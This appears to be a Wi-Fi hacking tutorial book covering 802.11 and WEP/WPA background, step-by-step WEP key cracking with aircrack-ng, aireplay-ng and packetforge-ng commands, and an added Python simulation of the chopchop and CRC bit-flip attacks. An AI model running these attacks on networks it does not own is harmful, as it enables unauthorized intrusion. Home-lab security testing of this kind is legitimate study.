Lab Setup
Hardware and software requirements
Kali Linux VM installation
Setting up the wireless adapter
Wireless overview
IEEE802.11 standard
802.11 topologies
Wireless Network Threats
Wireless Network Security Protocols
WEP
WPA1 & WPA2
WPA3
Wireless Penetration Test
Recommended Hardware
Wireless Sniffing
Create Password list with Crunch
Crack Wi-Fi network
WEP password cracking with aircrack-ng suite
WPA/WPA2 Exploits
Denial of Service (DOS) Attacks
Crack WPA3
Automated Wi-Fi (WPA2/WPS) cracking
Crack WPA2 using Fern Wi-Fi Cracker
Crack WPA2 using wifite
Man In The Middle attack with Wifiphisher
OceanofPDF.com
Preface
Like any major technological advance, Wi-Fi carries a risk of hacking: whether attacked remotely or locally, your Wi-Fi connection is now a favorite prey of hackers.
Better knowledge of potential Wi-Fi vulnerabilities improves the protection
of the networks we manage.
The methods and tools used in this book are for educational purposes only,
this book teaches you how to test the security of your own home wireless
network.
You can download the virtual machine used in this book at
https://www.mediafire.com/folder/0vpyh3638h0fm/Wifi_Book
Book cover designed by Jameson Fortin / [email protected]
ACRONYMS
AES: Advanced Encryption Standard.
AP: Access Point.
ARP: Address Resolution Protocol.
BS: Base Station.
BSS: Basic Service Set
DoS: Denial of Service.
EAP: Extensible Authentication Protocol.
EAPOL: Extensible Authentication Protocol over LAN.
GMK: Group Master Key
GTK: Group Temporal Key.
IEEE: Institute of Electrical and Electronics Engineers.
KCK: Key Confirmation Key.
KEK: Key Encryption Key.
LAN: Local Area Network.
MAC: Media Access Control.
MIC: Message Integrity Code.
PMK: Pairwise Master Key
PSK: Pre-Shared Key
PTK: Pairwise Transient Key
RSNA: Robust Security Network Association.
TK: Temporal Key.
TSN: Transition Security Network (an RSN that still admits pre-RSN/WEP stations).
WEP: Wired Equivalent Privacy.
Wi-Fi: Wireless Fidelity (a backronym; the Wi-Fi Alliance trademark does not officially expand to anything).
WLAN: Wireless Local Area Network.
WPAN: Wireless Personal Area Network.
WPA: Wi-Fi Protected Access.
Lab Setup
Hardware and software requirements
Windows 10 laptop with at least 8 GB of RAM, running Kali Linux 2019.4 (undercover mode) in a virtual machine.
Any Wi-Fi access point (in this book we use an old Linksys WRT160N v3 router that supports WEP and WPA/WPA2). Do not test on a neighbor's Wi-Fi: it is illegal. Always use your own network for testing.
An Alfa AC1900 adapter and an Alfa AWUS036NH adapter for the tests.
A brand new Netgear 4-stream Wi-Fi 6 router to test the new WPA3.
Aireplay-ng - Aireplay-ng is included in the aircrack-ng package and is
used to inject wireless frames. Its main role is to generate traffic for later
use in aircrack-ng for cracking WEP and WPA-PSK keys. Aireplay-ng has
many attacks that can deauthenticate wireless clients for the purpose of
capturing WPA handshake data, fake authentications, interactive packet
replay, hand-crafted ARP request injection, and ARP-request reinjection.
Airodump-ng - Airodump-ng is included in the aircrack-ng package and is
used for packet capturing of raw 802.11 frames. It is ideal for collecting
WEP IVs for use with aircrack-ng.
Aircrack-ng - Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking
program that can recover keys once enough data packets have been
captured. It implements the standard FMS attack along with some
optimizations like KoreK attacks, as well as the all-new PTW attack, thus
making the attack much faster compared to other WEP cracking tools.
Fern wifi cracker - Fern wifi Cracker is a wireless security auditing and
attack software program written using the Python Programming Language
and the Python Qt GUI library, the program is able to crack and recover
WEP/WPA/WPS keys and also run other network based attacks on wireless
or ethernet based networks.
Wifite – aims to attack multiple WEP, WPA, and WPS encrypted networks
in a row.
Wireshark - an open source packet analyzer used for network troubleshooting, analysis, software development and communication protocol development.
Mdk3 - MDK is a proof-of-concept tool to exploit common IEEE 802.11
protocol weaknesses.
Wifiphisher - is a rogue Access Point framework for conducting Wi-Fi
security testing.
Kali Linux VM installation
1- Download and install VirtualBox
2- Download the Kali Linux VirtualBox 64-Bit .ova (2019.4) file at https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/#1572305786534-030ce714-cc3b
3- Double click the .ova file and click Import
4- Configure the network adapter (Right click on your Kali VM in
VirtualBox Manager and click settings)
5- It is recommended to change the default Kali password.
Password : P@ssword-2020
Launch kali Linux VM
Setting up the wireless adapter
Setting up the Alfa AC1900 wireless adapter
1- Install the driver that comes with the adapter on Windows 10.
2- Plug the Alfa card into the laptop.
3- Install the driver in our Kali Linux VM.
a) Download the driver source for Linux
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
b) Install the build dependencies
apt-get install build-essential bc libelf-dev
c) Install dkms (a system that automatically recompiles and reinstalls a kernel module when a new kernel is installed or updated)
apt-get install dkms
d) Build and install the driver from the cloned directory
cd rtl8812au
./dkms-install.sh
4- Connect the Wi-Fi adapter to the VirtualBox VM: right-click the USB icon at the bottom right of the Kali virtual machine window and select the adapter "Realtek 802.11ac NIC".
5- Test the adapter with the commands iwconfig and iw list (the output of iw list should include "monitor" under "Supported interface modes"; without it none of the attacks in this book will work).
Note: If you build your lab on a Windows 7 laptop with the Alfa AWUS036NH adapter you do not need to install a driver; this model is plug-and-play (on Linux its Ralink RT3070 chipset is supported by the in-kernel rt2800usb driver).
Setting up the Alfa AWS360NH wireless adapter
1- Download, unzip and install the driver for Windows 10 (windows_vista_7_8_10_32_64bit.zip) from https://files.alfa.com.tw/?dir=%5B1%5D%20WiFi%20USB%20adapter/AWUS036NH/Windows
2- Plug in the alfa card in the laptop
3- Connect the Wi-Fi adapter card in VirtualBox
Wireless overview
Wireless networking (WLAN) is a set of communication and security
technologies that operate over a standard set of radio frequencies for
communication. Using these frequencies, a number of standards have been
defined, enabling multiple vendors to interoperate.
Wireless networks offer great benefits such as flexibility, portability, and
low installation cost.
IEEE802.11 standard
The class of standards for wireless LANs known as IEEE 802.11 is the one mainly used today.
Wi-Fi ("Wireless Fidelity"): the trade name for wireless LAN technology based on IEEE 802.11 that connects computers without cables.
Wireless networks allow computers to "talk" to each other by transmitting and receiving radio waves.
Standard             Frequency                                Maximum data rate
802.11a              5 GHz                                    54 Mbps
802.11b              2.4 GHz (unlicensed ISM band)            11 Mbps
802.11g              2.4 GHz                                  54 Mbps
802.11n              2.4 and 5 GHz (multiple antennas, MIMO)  600 Mbps
802.11ac             5 GHz                                    about 6.9 Gbps
802.11ad             60 GHz                                   about 7 Gbps
802.11ax (Wi-Fi 6)   2.4 and 5 GHz (6 GHz with Wi-Fi 6E)      about 9.6 Gbps
Wireless Mode
• Infrastructure mode
• Ad hoc mode
802.11 topologies
Three basic topologies for WLANs
-IBSS: Independent Basic Service Set
-BSS: Basic Service Set
-ESS: Extended Service Set
IBSS Topology
IBSS: Independent Basic Service Set
Peer-to-peer or ad-hoc network
Stations communicate directly with one another; must be within range
of each other, generally are not connected to a larger network.
No Access Point
BSS Topology
BSS: Basic Service Set (a.k.a. “cell”) contains:
wireless hosts
access point (AP): base station
Infrastructure mode
An Access Point connects between clients
Each station has one link at a time, via a unique Access Point.
ESS Topology
ESS: Extended Service Set
Infrastructure mode
Consists of overlapping BSSs (each with an Access Point)
DS (Distribution System) connects APs together, almost always
Ethernet
ESS allows clients to roam seamlessly between APs
ESS hides the mobility of the mobile stations from everything outside
the ESS
Access Points (APs)
Usually connects wireless and wired networks
Consists of a radio, a wired network interface
Wireless networks are identified using a Service Set Identifier (SSID)
-SSID defines which Wireless networks a station wishes to associate itself
with.
-Each Access Point is configured with a SSID.
-Client must be configured with the right SSID to be able to associate itself
with a specific AP.
SSIDs come in several forms:
SSID: generic term, referring to the wireless network name
BSSID: Basic SSID - The MAC address of the Access Point
ESSID: Extended SSID - a name applied to one or more APs providing the
same service to access a wired LAN.
Note: In Canada and the USA the 2.4 GHz band has eleven 802.11 channels; only channels 1, 6 and 11 do not overlap. The -c option of airodump-ng and aireplay-ng later in this book refers to these channel numbers.
Wireless Network Threats
Malicious or accidental association
A hacker can force an unsuspecting user station to connect to a spoofed
802.11 network (malicious access points), or alter the configuration of the
station to operate in an ad-hoc networking mode.
As the victim’s user station broadcast a request to associate with an access
point, the hacker’s soft access point responds to this request and establishes
a connection between the two. Next, the soft access point provides an IP
address to the victim’s user station.
Identity theft (MAC spoofing)
A hacker can capture the MAC address of a valid user with some software
tools, a hacker can change his MAC address to the victim’s MAC address
using some spoofing utility. Once this has been done, the hacker can
connect to the wireless LAN, bypassing any MAC address filtering.
Man-in-the-middle attacks
A hacker can easily turn a wireless device into a soft AP and position that access point in the middle of the communication session.
A more sophisticated MITM attack abuses the unauthenticated 802.11 management frames: a deauthentication attack knocks a user off an access point, causing the client to look for a new access point to connect to. The hacker's soft AP, advertising the same SSID, accepts the client, while a second wireless interface connects to the real wireless LAN and relays all traffic, including the authentication traffic, to the real network.
Denial of service attacks (DoS)
DoS attacks can be directed against a specific user station to prevent that station from communicating on the network, against a specific AP to prevent stations from connecting to it, or against all network devices at once.
The most common DoS attacks on IEEE 802.11 wireless networks flood the air with:
-Deauthentication frames
-Authentication request frames
-Association request frames
None of these frames is authenticated in WEP, WPA or WPA2 networks, so any station can forge them; only Protected Management Frames (802.11w, mandatory in WPA3) close this hole.
Network Injection Attacks
Network injection attacks exploit improperly configured wireless LANs or rogue access points to inject traffic that targets the entire network.
Wireless Network Security Protocols
Wireless security protocols protect a wireless network with authentication and encryption: a password or network key is required when a user or device tries to connect, and the traffic between the device and the access point is then encrypted.
WEP
Wired Equivalent Privacy was introduced with the original IEEE 802.11 standard in 1997. WEP encrypts data with the RC4 stream cipher using a 64-bit or 128-bit key; 24 of those bits are the per-packet IV sent in clear, so the secret part of the key is only 40 or 104 bits.
WEP Authentication Modes
Open System
- Client does not need to provide any credentials
- Immediate association with access point
- but can only send and receive info if using correct key
Shared Key
Client begins by sending an authentication request to the AP
AP responds with a 128-byte challenge text (unencrypted)
Client encrypts the challenge with the WEP key and sends it back to the AP
If it decrypts correctly, the AP allows communication with the client
Caveat: Shared Key authentication is weaker than Open System. An eavesdropper who sees the clear challenge and the encrypted response obtains 128 bytes of RC4 keystream for that IV, which is enough to pass the same authentication later (aireplay-ng -1 does this with the -y keystream option).
802.11 WEP frame
The 4-byte WEP header sent in clear ahead of the ciphertext contains two fields: the 24-bit IV and the 2-bit KeyID (plus 6 padding bits).
WEP Key Management
– Each entity in the wireless LAN (AP, Clients) is configured
with four static WEP keys
KeyIDs 0,1,2,3
– The keys are shared by an Access Points and all the wireless
station accessing it.
– The ID of the key used for encryption/decryption appears in
the packet WEP header.
RC4 key
• Standard - 24 + 40 = 64-bit RC4 key
• Vendors - 24 + 104 = 128-bit RC4 key
• We will see that key-size does not prevent the attacks.
Checksum
CRC-32 is designed to detect random transmission errors, not deliberate modification.
If the CRC is correct, WEP assumes:
Packet has not been modified
Packet is from an authorized user
Both assumptions are wrong: CRC-32 is linear, so a packet can be modified and its checksum corrected without knowing the key, and nothing in the packet proves who sent it.
RC4
Developed by Rivest in 1987
Kept as a trade secret (but leaked in 1994)
Key can be between 1 and 256 bytes
Used as a simple and fast generator of a pseudo-random sequence of bytes that is XORed with the plaintext (a "one-time pad", which is only secure if no keystream byte is ever reused)
The first bytes of the output are biased, so implementations should discard at least the first 256 bytes of keystream. WEP does not, and it also builds the per-packet RC4 key as IV || secret key, which is exactly what the FMS, KoreK and PTW key-recovery attacks exploit.
WPA1 & WPA2
Wi-Fi Protected Access is a trade name applied to certain aspects of the 802.11i standard. WPA1 relies on a protocol known as the Temporal Key Integrity Protocol (TKIP), with several security features designed to avoid the pitfalls of the earlier WEP.
WPA can be deployed either with a pre-shared master key loaded into every access point and client (WPA-Personal), or with 802.1X/EAP infrastructure that authenticates each user and distributes keys through a RADIUS server (WPA-Enterprise, commonly with an EAP method such as the Protected Extensible Authentication Protocol, PEAP).
WPA comes in two flavors: WPA1 and WPA2.
WPA1 implements a subset of 802.11i functionality, trading some security so that it can run on older access points without much processing power. WPA1 uses TKIP, with RC4 as its core encryption algorithm, to protect packets going across the network.
WPA2 implements full 802.11i functionality, using the more computationally complex but much stronger AES encryption algorithm. WPA2 uses AES in a mode called CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol).
Note: WPA-PSK (Pre-Shared Key) is used for small office and home networks and does not use an authentication server. Everything in the "WPA/WPA2 Exploits" chapter targets this mode; the passphrase is the only secret.
WPA Cryptographic Algorithms and Protocols
Keyed-Hash Message Authentication Code (HMAC) - hash - WPA
  Performs message authentication/verification using a cryptographic hash function and a secret key. The strength depends on the underlying hash function (e.g. SHA-1) and the size of the key.
Rivest Cipher 4 (RC4) - stream cipher - WPA
  Variable-key-size stream cipher. A pseudo-random byte stream is XORed with the plaintext to create the ciphertext. The key schedule first initializes a 256-byte state vector and then permutes it under control of the key; TKIP feeds it a 128-bit per-packet key.
Temporal Key Integrity Protocol (TKIP) - encryption and MIC - WPA
  Derives a new RC4 key for each encrypted packet, adds a Message Integrity Check (MIC, "Michael") to each packet, and generates fresh keys for each session. Uses RC4 with 128-bit keys for encryption and a 64-bit key for the MIC.
Advanced Encryption Standard (AES) - block cipher - WPA2
  Block cipher with a fixed block size of 128 bits and a key size of 128, 192 or 256 bits. The algorithm operates on a 4x4 byte matrix, applying the operations add round key, substitute bytes (from a lookup table), shift rows and mix columns over multiple rounds.
Cipher Block Chaining Message Authentication Code (CBC-MAC) - MIC - WPA2
  Chains AES block encryptions to compute an integrity check over the message; each block depends on the encryption of the preceding block.
Counter Mode with CBC-MAC Protocol (CCMP) - encryption and MIC - WPA2
  Encrypts packets with AES in counter mode and authenticates them with CBC-MAC (AES-CCM with a 128-bit key). It fills the same role as TKIP (confidentiality plus integrity) without TKIP's RC4 legacy.
WPA Encryption Algorithm (TKIP)
WPA2 4-way Handshake
The 4-way handshake is the exchange of four EAPOL-Key messages between an Access Point (AP) and the client that derives the session keys from the PMK:
1) AP -> client: ANonce
2) client -> AP: SNonce + MIC (the client has now computed the PTK)
3) AP -> client: GTK encrypted with the KEK + MIC (the AP has computed the same PTK)
4) client -> AP: acknowledgement + MIC
Messages 2, 3 and 4 carry a MIC keyed with the KCK part of the PTK. Anyone who captures the nonces and one MIC-protected message therefore has everything needed to test passphrase guesses offline; this is the basis of the dictionary attack later in this book.
WPA2 deauthentication
WPA3
WPA3 is the next generation of Wi-Fi security and brings up-to-date security protocols to the market. WPA3 adds new features to simplify Wi-Fi security, enable more robust authentication, deliver increased cryptographic strength for highly sensitive data markets, and maintain the resiliency of mission-critical networks.
WPA3 uses the latest security methods:
- disallows outdated legacy protocols
- requires the use of Protected Management Frames (PMF, IEEE 802.11w), so deauthentication and disassociation frames are authenticated and the forged ones used by the attacks in this book are ignored
WPA3-Personal
WPA3-Personal brings better protection to individual users by providing more robust password-based authentication, even when users choose passwords that fall short of typical complexity recommendations. This capability is enabled through Simultaneous Authentication of Equals (SAE), which replaces the Pre-Shared Key (PSK) exchange of WPA2-Personal.
SAE is resistant to offline dictionary attacks: it is a password-authenticated key exchange, so an attacker can test only one password guess per live exchange with the AP and learns nothing about the password from a passively captured handshake.
WPA3-Enterprise
WPA3-Enterprise builds upon WPA2 and ensures the consistent application of security protocols across the network.
WPA3-Enterprise also offers an optional mode using 192-bit minimum-strength security protocols and cryptographic tools to better protect sensitive data:
- Authenticated encryption: 256-bit Galois/Counter Mode Protocol (GCMP-256)
- Key derivation and confirmation: 384-bit Hashed Message Authentication Code (HMAC) with Secure Hash Algorithm (HMAC-SHA384)
- Key establishment and authentication: Elliptic Curve Diffie-Hellman (ECDH) exchange and Elliptic Curve Digital Signature Algorithm (ECDSA) using a 384-bit elliptic curve
- Robust management frame protection: 256-bit Broadcast/Multicast Integrity Protocol Galois Message Authentication Code (BIP-GMAC-256)
The 192-bit security mode offered by WPA3-Enterprise ensures the right combination of cryptographic tools is used and sets a consistent baseline of security within a WPA3 network.
Wireless Penetration Test
Recommended Hardware
- ALFA AWUS036NEH Long Range Wireless 802.11b/g/n Wi-Fi USB Adapter
- Panda Wireless PAU09 N600 Dual Band (2.4 GHz and 5 GHz) Wireless N USB Adapter with dual 5 dBi antennas
- Alfa AWUS036NH High Gain USB Wireless G/N Long-Range Wi-Fi Network Adapter
- TP-Link Nano USB Wi-Fi Dongle, 150 Mbps High Gain Wireless Network Adapter
- Alfa AWUS036NHA Wireless B/G/N USB Adapter, 802.11n, 150 Mbps, 2.4 GHz, 5 dBi antenna, long range, Atheros chipset
- Alfa Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi Adapter with 2x 5 dBi external antennas, 2.4 GHz 300 Mbps / 5 GHz 867 Mbps, 802.11ac and a/b/g/n
- Alfa AC1900 Wi-Fi Adapter, 1900 Mbps 802.11ac Long-Range Dual Band USB 3.0 Wi-Fi Network Adapter with 4x 5 dBi external dual-band antennas
- TRENDnet AC1900 High Power Dual Band Wireless USB Adapter (TEW-809UB) with high gain antennas to extend Wi-Fi coverage
Whatever the model, what matters is that its chipset supports monitor mode and frame injection under Linux; check with iw list (look for "monitor" under supported interface modes) and with the injection test aireplay-ng --test <interface>.
Wireless Sniffing
Sniffing is a process of monitoring and capturing all data packets passing
through a given network.
There are numerous sniffing tools available that can gather packets from a
wireless interface (Wireshark, Kismet).
When sniffing using a wireless interface, the mode of that interface
becomes very important.
Wireless interfaces can be in any one of several modes:
Master mode – the wireless interface acts like an access point, responding
to request for access to the network.
Ad-hoc mode – the wireless interface allows for peer-to-peer connections
with other wireless clients.
Managed mode – the wireless interface acts like a wireless client, able to
connect to access points operating in master mode.
Monitor mode - the wireless card passively captures raw 802.11 frames from one channel and passes them to the operating system without associating to any network and without decoding the embedded protocols.
In monitor mode we can sniff a wireless network very quietly, and the interface cannot send ordinary network traffic. Raw frame injection is possible only when the driver supports it, which is exactly what aireplay-ng and mdk3 rely on in the following chapters; verify it with aireplay-ng --test on the monitor interface before starting an attack.
Create Password list with Crunch
Password cracking is made easier by a wordlist that can attempt thousands
of potential passwords each second. The wordlist can be used for a
dictionary attack when it contains words that are likely to succeed.
Crunch
Crunch is a wordlist generator: you specify a minimum and maximum length and either a standard character set or one of your own, and crunch generates every possible combination (with repetition, i.e. every string of those lengths over the character set).
crunch <min> <max> [charset] [options]
Length 4 to length 6, using lowercase letters (the default character set)
crunch 4 6 -o file.txt
8-character passwords using lowercase letters, uppercase letters and digits
crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric
8-character passwords using lowercase letters, uppercase letters, digits, symbols and even whitespace
crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric-symbol14-space
To be honest, I do not advise you to generate such a heavy password list: mixalpha-numeric alone gives 62^8, about 2.2 x 10^14, entries (crunch prints the size before it starts), which is roughly 2 petabytes on disk. Prefer a curated list such as /usr/share/wordlists/rockyou.txt.gz on Kali (gunzip it first), or pipe crunch's output straight into the cracker instead of writing it to a file.
The file charset.lst contains a list of character sets ready to be used in your password lists.
Crack Wi-Fi network
WEP weakness
Clear text initialization vectors: with the IV for each packet sent in clear in the packet itself, an attacker who samples traffic already knows a large part of the RC4 key, 24 of the 64 bits or 24 of the 128 bits, giving the attacker a head start in breaking the key.
The IVs are too short (only 24 bits): on a busy network the same IV, and therefore the same RC4 keystream, repeats within hours, and XORing two packets encrypted under the same IV cancels the keystream and leaves the XOR of the two plaintexts.
Weak integrity checksum: WEP uses the cryptographically weak CRC-32 checksum to verify the integrity of packets. Because CRC-32 is linear, an attacker can flip chosen bits of an encrypted packet and correct the encrypted checksum without knowing the key, so it is easy to inject modified packets into the network.
No replay protection: nothing in a WEP-protected packet prevents it from being captured and replayed later. The only per-packet value is the IV, which the attacker reads from the sampled packet, and even that is not unique enough, with collisions occurring frequently. The ARP replay attack of aireplay-ng relies on exactly this.
Known clear text allows attacks against WEP keys: almost every wireless data packet starts with an LLC/SNAP header in a format known to the attacker (AA AA 03 00 ...), so a candidate key can be tested by decrypting the packet and checking for these bytes, and for any captured packet the attacker immediately knows the first keystream bytes. Combined with the weak IV || key construction of the RC4 key, this is the basis of the FMS, KoreK and PTW key-recovery attacks implemented in aircrack-ng.
WEP password cracking with aircrack-ng suite
We will set up a WEP network for a practical test. The wireless router we will use is a Linksys WRT160N v3 with my Android phone and my Windows 10 laptop connected to it.
The attack will be performed from Kali 2019.4 (undercover). The hardware we will use for the test is an Alfa AC1900 adapter compatible with Kali Linux.
Step 1: Configure the Linksys router with WEP security mode.
Step 2: Plug our Alfa adapter into the Windows 10 laptop and attach it to the Kali Linux virtual machine.
Step 3: Put the wireless interface into monitor mode.
airmon-ng start wlan0
Note: on current Kali releases airmon-ng creates a new monitor interface named wlan0mon; if it does, use that name instead of wlan0 in all of the following commands. Run airmon-ng check kill first if NetworkManager or wpa_supplicant keep changing the channel.
Step 4: Find the BSSID and channel used with the command airodump-ng wlan0
Note the BSSID 68:7F:74:30:95:BA of our Wi-Fi "Mywifi".
Press Ctrl+C to stop the capture.
Step 5: Monitor the traffic of the target network, in our case "Mywifi"
airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w wecap wlan0
Step 6: In order to generate traffic, we will launch the ARP request replay attack.
Open a second terminal and type the command
aireplay-ng --arpreplay -b 68:7F:74:30:95:BA -h 3C:6A:A7:AC:20:A6 wlan0
-b bssid: MAC address of the access point
-h smac: source MAC address (here the MAC of a client associated to the AP, so the AP accepts the replayed ARP requests)
In the monitoring terminal, which captures the data packets, you should see the count in the #Data column rise rapidly: each replayed ARP request makes the AP answer with a new packet carrying a new IV.
Step 7: Crack the WEP key.
Open a third terminal and run aircrack on the capture file with the command
aircrack-ng -b 68:7F:74:30:95:BA wecap-08.cap
aircrack-ng's PTW attack typically succeeds with roughly 20,000 to 40,000 unique IVs for a 40-bit key and 40,000 to 85,000 for a 104-bit key; if it fails, let airodump-ng collect more data and run it again.
Break WEP without a victim client with the chopchop attack
Chopchop attack: this attack was published under the pseudonym KoreK in 2004. The attacker can decrypt the last s bytes of an encrypted packet by sending an average of s*128 packets to the network, without ever recovering the root key. The 4-byte Integrity Check Value (ICV) appended to the plaintext is a CRC-32, and the attack exploits the fact that this checksum is linear. Access points behave differently for an encrypted packet with a correct checksum (they relay it) and one with an incorrect checksum (they silently discard it), and this is the oracle the attacker uses. The attacker chops one byte from the end of a captured packet, guesses that byte's plaintext value, patches the last four bytes of the shortened packet so that its checksum is correct again if the guess is right, and sends the packet to the access point. If the guess was correct, the access point accepts the packet; the attacker now knows that byte of plaintext, and therefore of the keystream, and proceeds to the second-to-last byte. If the guess was incorrect, the access point silently discards the packet and the attacker tries another value. Byte by byte this yields the RC4 keystream for that IV, which is enough to decrypt the captured packet and to forge new packets (for example ARP requests) under the same IV without knowing the key. Together with ARP replay this significantly reduces the time required to crack WEP keys.
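The chopchop logic described above, together with the CRC-32 and known-plaintext weaknesses from the "WEP weakness" list, as an added example that is not part of the original book: a miniature WEP implementation in Python (RC4 plus the CRC-32 ICV), a bit-flip forgery that keeps the ICV valid without knowing the key, and the chopchop attack run against a simulated access point that acts as the accept/reject oracle. The key, IV and packet contents are constructed for the example; the LLC/SNAP header bytes are the real constant that starts every IP/ARP data frame.

```python
"""WEP in miniature: RC4 keystream, CRC-32 ICV, a CRC bit-flip forgery and the
KoreK chopchop attack against a simulated AP used as accept/reject oracle.
Keys, IVs and packet contents are constructed; no radio or capture involved."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA then PRGA). WEP seeds it with IV || secret key and
    uses the stream from its very first byte (no drop-n)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    assert len(a) == len(b), "xor operands must have equal length"
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Plaintext if the ICV verifies, else None (the AP silently drops it)."""
    iv, cipher = frame[:3], frame[3:]
    if len(cipher) < 4:
        return None
    body = xor(cipher, rc4(iv + key, len(cipher)))
    return body[:-4] if icv(body[:-4]) == body[-4:] else None


def bitflip(frame: bytes, delta: bytes) -> bytes:
    """CRC-32 is affine, crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0...0), so anyone can
    XOR a pattern D into the ciphertext and patch the encrypted ICV to match."""
    fix = xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + fix)


def build_chop_table() -> dict:
    """table[x]: 4-byte patch that makes a valid (data || ICV) codeword ending in
    byte x valid again once x is chopped off. The CRC check is affine, so the
    patch depends only on x and can be read off any valid codeword ending in x."""
    table, n = {}, 0
    while len(table) < 256:
        m = n.to_bytes(4, "little")
        w = m + icv(m)                          # a valid codeword
        if w[-1] not in table:
            t = w[:-1]
            table[w[-1]] = xor(t[-4:], icv(t[:-4]))
        n += 1
    return table


CHOP = build_chop_table()


def chopchop(frame: bytes, ap_accepts, nbytes: int) -> bytes:
    """Recover the last `nbytes` keystream bytes of this frame's IV using only
    an accept/reject oracle. Average cost: 128 injected packets per byte."""
    iv, cur, keystream = frame[:3], frame[3:], b""
    for _ in range(nbytes):
        chopped = cur[:-1]
        for guess in range(256):
            cand = chopped[:-4] + xor(chopped[-4:], CHOP[guess])
            if ap_accepts(iv + cand):           # ICV verified: guess is the plaintext byte
                keystream = bytes([cur[-1] ^ guess]) + keystream
                cur = cand
                break
        else:
            raise RuntimeError("no guess accepted: oracle is not WEP-like")
    return keystream


KEY = b"\x0a\x1b\x2c\x3d\x4e"      # constructed 40-bit key; the attacker never learns it
IV = b"\x01\x02\x03"                # constructed IV, sent in clear
LLC_SNAP = b"\xaa\xaa\x03\x00"      # real constant: start of every IP/ARP data frame
PLAINTEXT = LLC_SNAP + b"\x00\x00\x08\x06" + b"constructed-arp-data"


def demo() -> dict:
    frame = wep_encrypt(KEY, IV, PLAINTEXT)                   # what airodump-ng captures
    ap_accepts = lambda f: wep_decrypt(KEY, f) is not None    # what the AP does
    # 1. ICV gives no integrity: flip the last 4 payload bytes without the key.
    delta = bytes(len(PLAINTEXT) - 4) + b"!!!!"
    flipped = wep_decrypt(KEY, bitflip(frame, delta))
    # 2. chopchop recovers the keystream tail; the known LLC/SNAP header gives
    #    the first 4 keystream bytes (WEP's "known clear text").
    ks = xor(frame[3:7], LLC_SNAP) + chopchop(frame, ap_accepts, len(PLAINTEXT))
    recovered = xor(frame[3:], ks)[:-4]
    # 3. With the keystream for this IV, forge a packet without the key (what
    #    packetforge-ng does with the .xor file written by aireplay-ng -4).
    forged_plain = LLC_SNAP + b"\x00\x00\x08\x06" + b"forged-arp"
    forged_body = forged_plain + icv(forged_plain)
    forged = IV + xor(forged_body, ks[:len(forged_body)])
    return {"flipped": flipped, "recovered": recovered, "keystream_len": len(ks),
            "forged_ok": wep_decrypt(KEY, forged) == forged_plain}
```

Run demo(): it recovers the whole plaintext and the full keystream of one captured frame with roughly 128 oracle queries per byte, then forges a fresh packet under the same IV, which is exactly the input packetforge-ng needs and why a single chopchopped packet is enough to start an ARP replay. aireplay-ng -4 does the same against a real AP, which relays a packet with a valid ICV and drops one without.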
Step 1: Put the wireless interface into monitor mode
airmon-ng start wlan0
Step 2: Monitor the traffic of the target network
Find the BSSID and channel used with the command airodump-ng wlan0, then
airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w chopatt wlan0
Step 3: Fake-authenticate to the access point (the AP only relays packets from an associated source MAC, so both the chopchop attack and the later injection need an authenticated MAC)
aireplay-ng -1 0 -a 68:7F:74:30:95:BA wlan0
-1 delay: fake authentication with the AP; 0 means authenticate once (a larger value re-authenticates every delay seconds)
-a bssid: set the access point MAC address
-h smac: source MAC address; when omitted, as here, the adapter's own MAC is used (00:C0:CA:A6:57:99 in our lab)
Step 4: Launch the chopchop attack
Open a new terminal and type
aireplay-ng -4 -b 68:7F:74:30:95:BA -h 00:C0:CA:A6:57:99 wlan0
-4: decrypt/chopchop a WEP packet
-b bssid: MAC address of the access point
-h smac: the source MAC you fake-authenticated with
At the prompt asking "Use this packet ?" type y and press Enter.
Note: if it says "The chopchop attack appears to have failed. Possible reasons:" try again, if necessary answering n to pick a different packet.
If the chopchop attack succeeds, aireplay-ng prints the decrypted packet and saves the recovered keystream in a file named replay_dec-<date>-<time>.xor (and the decrypted packet in the matching .cap file).
Step 5: Forge an ARP request packet using packetforge-ng
packetforge-ng -0 -a <targetMac> -h <yourMac> -k 255.255.255.255 -l 255.255.255.255 -y <replay_dec-*.xor file from the chopchop attack> -w mypacket.cap
-0: build an ARP request
-a bssid, -h smac: access point MAC and your (fake-authenticated) source MAC
-k / -l: destination and source IP addresses; the broadcast address 255.255.255.255 is accepted by most APs
-y file: read the keystream (PRGA) from this .xor file
-w file: write the forged packet to this file
Step 6: Send out the forged packet
aireplay-ng -2 -h 56:58:D4:70:3B:AD -r mypacket.cap wlan0
-2: interactive frame selection (replay the chosen frame)
-r file: extract packets from this pcap file
-h smac: the source MAC used in the fake authentication
In the monitoring terminal, which captures the data packets, you should see the count in the #Data column rise rapidly. Wait for some more data to be written.
Step 7: Open a third terminal and run aircrack on the chopatt file located in the root directory with the command
aircrack-ng chopatt-02.cap
WEP encryption does not provide sufficient wireless network security,
therefore it is not recommended to use WEP.
R.I.P. WEP
WPA/WPA2 Exploits
There are a number of exploits available against Wi-Fi Protected Access
